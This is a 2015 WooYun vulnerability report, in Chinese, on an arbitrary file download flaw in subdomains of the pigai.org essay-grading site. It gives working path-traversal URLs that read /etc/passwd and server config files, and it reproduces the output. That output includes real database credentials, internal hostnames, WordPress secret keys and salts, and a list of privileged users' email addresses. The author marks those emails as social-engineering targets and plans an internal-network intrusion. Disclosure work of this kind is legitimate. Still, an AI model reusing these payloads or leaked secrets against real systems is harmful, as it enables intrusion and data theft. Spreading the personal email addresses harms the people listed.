当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105117

漏洞标题:句酷批改网某分站任意文件下载影响大量分站#1

相关厂商:pigai.org

漏洞作者: J4nker

提交时间:2015-04-02 14:35

修复时间:2015-05-17 14:40

公开时间:2015-05-17 14:40

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-02: 细节已通知厂商并且等待厂商处理中
2015-04-02: 厂商已经确认,细节仅向厂商公开
2015-04-12: 细节向核心白帽子及相关领域专家公开
2015-04-22: 细节向普通白帽子公开
2015-05-02: 细节向实习白帽子公开
2015-05-17: 细节向公众公开

简要描述:

句酷批改网某分站任意文件下载影响大量分站

详细说明:

句酷批改网某分站任意文件下载影响大量分站

漏洞证明:

http://bec.pigai.org/?core-dl&f=/../../../../../../../etc/passwd 

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
qpidd:x:498:499:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
cikuu:x:500:500::/home/cikuu:/bin/bash
www:x:501:501::/home/www:/bin/bash
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
nx:x:497:497::/var/lib/nxserver/home:/usr/bin/nxserver
rtkit:x:496:496:RealtimeKit:/proc:/sbin/nologin
pulse:x:495:495:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
sphinx:x:494:489:Sphinx server:/var/lib/sphinx:/bin/bash
lbjftpvideo:x:502:50::/opt/ftp:/sbin/nologin
testuser:x:503:503::/home/testuser:/bin/bash


任意文件下载
一个一个文件的读,找到数据库

<?php
define('DOMAINTYPE','off');
define('CH','exam_');
define('CDO','');
define('CP','/');
define('CRT',180);
define('CS','xn9dylsl012002');
define('HE','utf-8');
define('PN',10);
define('TIME',time());
if(dirname($_SERVER['SCRIPT_NAME']))
define('WP','http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/');
else
define('WP','http://'.$_SERVER['SERVER_NAME']);
define('DB','pigai_exam');//MYSQL数据库名
#define('DH','192.168.1.64');//MYSQL主机名,不用改
define('DH','db_exam.pigai.org');//请在host里面定义下
define('DU','cikuu');//MYSQL数据库用户名
define('DP','cikuutest!');//MYSQL数据库用户密码
define('DTH','x2_');//系统表前缀,不用改


此信息先留下 内网渗透。
接着找
include "global.inc.php";
里面说是特权用户。
http://bec.pigai.org/?core-dl&f=/lib/global.inc.php
#"liwei@cikuu.com",
"peadmin",
"651275983@qq.com",
"bambilun@163.com",
"limin@126.com",
"284272284@qq.com",
"frank_tsai@126.com",
"bec@pigai.org"
这些是特权用户。那就是高权限用户吧。。可以用来社工一下。
再继续查。发现这个IP 下面有5个网站。。那就一个一个的来读
暴路径 :http://wiki.pigai.org/wp-includes/registration-functions.php
得到网站路径/data2t/app/mediawiki-1.24.1/wordpress/wp-includes/registration-functions.php
(貌似这个网站之前有漏洞整改了,换成了wordpress还是难逃躺着也中枪)
然后下载获得wiki.pigai.org 数据库配置文件:

<?php
/**
 * WordPress基础配置文件。
 *
 * 本文件包含以下配置选项:MySQL设置、数据库表名前缀、密钥、
 * WordPress语言设定以及ABSPATH。如需更多信息,请访问
 * {@link http://codex.wordpress.org/zh-cn:%E7%BC%96%E8%BE%91_wp-config.php
 * 编辑wp-config.php}Codex页面。MySQL设置具体信息请咨询您的空间提供商。
 *
 * 这个文件被安装程序用于自动生成wp-config.php配置文件,
 * 您可以手动复制这个文件,并重命名为“wp-config.php”,然后填入相关信息。
 *
 * @package WordPress
 */
// ** MySQL 设置 - 具体信息来自您正在使用的主机 ** //
/** WordPress数据库的名称 */
define('DB_NAME', 'wiki');
/** MySQL数据库用户名 */
define('DB_USER', 'cikuu');
/** MySQL数据库密码 */
define('DB_PASSWORD', 'cikuutest!');
/** MySQL主机 */
define('DB_HOST', 'localhost');
/** 创建数据表时默认的文字编码 */
define('DB_CHARSET', 'utf8');
/** 数据库整理类型。如不确定请勿更改 */
define('DB_COLLATE', '');
/**#@+
 * 身份认证密钥与盐。
 *
 * 修改为任意独一无二的字串!
 * 或者直接访问{@link https://api.wordpress.org/secret-key/1.1/salt/
 * WordPress.org密钥生成服务}
 * 任何修改都会导致所有cookies失效,所有用户将必须重新登录。
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         ']`|X:Xm|*:p0V,&[De^I3{:5<s#[9{^>z8AIS6Rd7n`-gN}`BY&8|YR#y{;u!s9=');
define('SECURE_AUTH_KEY',  'M/,IBFf`@i;.ddEX|0!H6egGiIVNjd%!J0tTbcbGv%/H_qT[IR]@MrHrc/Es|n}6');
define('LOGGED_IN_KEY',    'ha5C.~h/tTaGrX@I7;e}qj$[3eTijr)Eo/>yaSX TJ8IT[%:R900sdv`_d+BUke4');
define('NONCE_KEY',        '2.n>coM-_2QUHCD+z>AT /&jkeBi{UolTJQ~B`Jv9Uz!]:1r2gRB*damraKX`4_x');
define('AUTH_SALT',        '> 7)H#7Iutqc!Oxq OcaKDB=,?uwiZ8aGK~F4EGq%oL-X[G/0M+~06-vNsXpF.c/');
define('SECURE_AUTH_SALT', 'Kan%{I:M7b[eLsO5T|kxo=D_s,H^(xh>X>s+x5C6rbf&wOQg`RoGX/nBJUj Tp D');
define('LOGGED_IN_SALT',   'OncKKpc>jQ3BP4T<.QJ#AShOyv^o[bmA,(o)-. VFl45D3N3k?;hp26PkTFclFLh');
define('NONCE_SALT',       's$=,^7RF*jIt7WR;tlv^PJGQztg#1~u)Bf:rAxwg~pP.A5Em38E;_%.usR/bcGf>');
/**#@-*/
/**
 * WordPress数据表前缀。
 *
 * 如果您有在同一数据库内安装多个WordPress的需求,请为每个WordPress设置
 * 不同的数据表前缀。前缀名只能为数字、字母加下划线。
 */
$table_prefix  = 'wp_';
/**
 * 开发者专用:WordPress调试模式。
 *
 * 将这个值改为true,WordPress将显示所有用于开发的提示。
 * 强烈建议插件开发者在开发环境中启用WP_DEBUG。
 */
define('WP_DEBUG', false);
/**
 * zh_CN本地化设置:启用ICP备案号显示
 *
 * 可在设置→常规中修改。
 * 如需禁用,请移除或注释掉本行。
 */
define('WP_ZH_CN_ICP_NUM', true);
/* 好了!请不要再继续编辑。请保存本文件。使用愉快! */
/** WordPress目录的绝对路径。 */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');
/** 设置WordPress变量和包含文件。 */
require_once(ABSPATH . 'wp-settings.php');


得到数据库密码。
这样说的话那 117.79.131.118上面的主机基本都能猜出个大概来了 http://tongti.pigai.org http://blir.pigai.org 涉及到5个网站(包括一个词语库)。危害还是很大的。
这只是第一弹,只说了这些危害。还有利用与更多的请看#2

修复方案:

运维约嘛?(送礼物)

版权声明:转载请注明来源 J4nker@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-04-02 14:39

厂商回复:

挺严重的 修复中

最新状态:

暂无